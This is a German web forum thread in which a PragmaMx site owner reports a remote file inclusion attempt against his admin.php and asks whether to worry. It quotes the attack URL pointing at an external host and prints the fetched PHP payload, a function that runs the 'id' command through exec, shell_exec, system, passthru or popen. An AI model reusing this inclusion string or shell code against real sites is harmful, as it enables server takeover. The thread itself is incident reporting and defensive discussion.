Suche

[Pac06]

Hallo Zusammen,

als ich mir eben im Who-is-online-Modul die Gäste angeschaut habe, ist mir aufgefallen, dass sich mehrere IPs im Adminbereich unter folgender Domain aufhalten:

http://www.bonusjaeger.de/admin.php?include_path=http://jorgevolio.com/.cookies/id.txt?

Versucht sich hier jemand unerlaubt Zugang zu verschaffen, oder muss man sich das keine Sorgen machen?

Danke und frohes neues Jahr
Henning

[StegRene]

Da da offensichtlich irgendwas von einer fremden Seite included wird, glaube ich, zurücklehnen wäre das Letzte, was Du tun solltest.

Nun bin ich aber leider nicht fit genug, die zu sagen, ob das da sehr schlimm ist
Ich denke, da wird sich wer vom Pragma-Team besser äussern können, die kennen sich mit sowas sicher aus.

Und das, was da included wird:

Code Auswählen Erweitern

<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

...............gefällt mir gar nicht!

[Pac06]

Hallo und vielen Dank für Deine schnelle Antwort!


Auch wenn ich mich nun schon etwas länger mit PragmaMx beschäftigt habe und einige Sachen selbstständig hinbekomme, so kann ich mit dem vorliegenden Code leider gar nix anfangen. Da das die erste Auffälligkeit in dieser Richtung ist, habe ich mich jetzt auch mit dem Thema Sicherheit nur wenig auseinander gesetzt und bin auf eure Hilfe angewiesen...

Wie sollte ich weiter vorgehen?

Habe ein Backup der Datenbank gemacht und die Passwörter geändert, außerdem hab ich alle Sicherheitsfunktionen von Pragma aktiviert.

Z.Zt. keine Auffälligkeiten im Who-is-Online-Modul...


Danke und MfG
Henning

[m-t]

Versucht sich hier jemand unerlaubt Zugang zu verschaffen, oder muss man sich das keine Sorgen machen?

jo, der denkt er hat nuke vor sich ;-)
lass ihn nur machen, wird ihm nix bringen

[Barbeytes]

Hallo,

schau Dir mal diese Seite an:

http://www.bot-trap.de

Vielleicht hilft Dir das weiter?

Gruß
Guido

[StegRene]

jo, der denkt er hat nuke vor sich ;-)
lass ihn nur machen, wird ihm nix bringen

Dann is ja gut, unschön ist trotzdem.............

[Pac06]

Yep, ein ungutes Gefühl bleibt.

Zum Glück hab ich mich von Pragma überzeugen lassen, bei Nuke wäre sie dann wohl schon wieder drinne gewesen   

Also nicht weiter davon stören lassen, oder sind noch irgendwelche Schritte zu empfehlen?

schau Dir mal diese Seite an:

http://www.bot-trap.de

Danke, werde mich da mal umsehen...!


Vielen Dank an Alle für die schnelle Hilfe!
Grüße Henning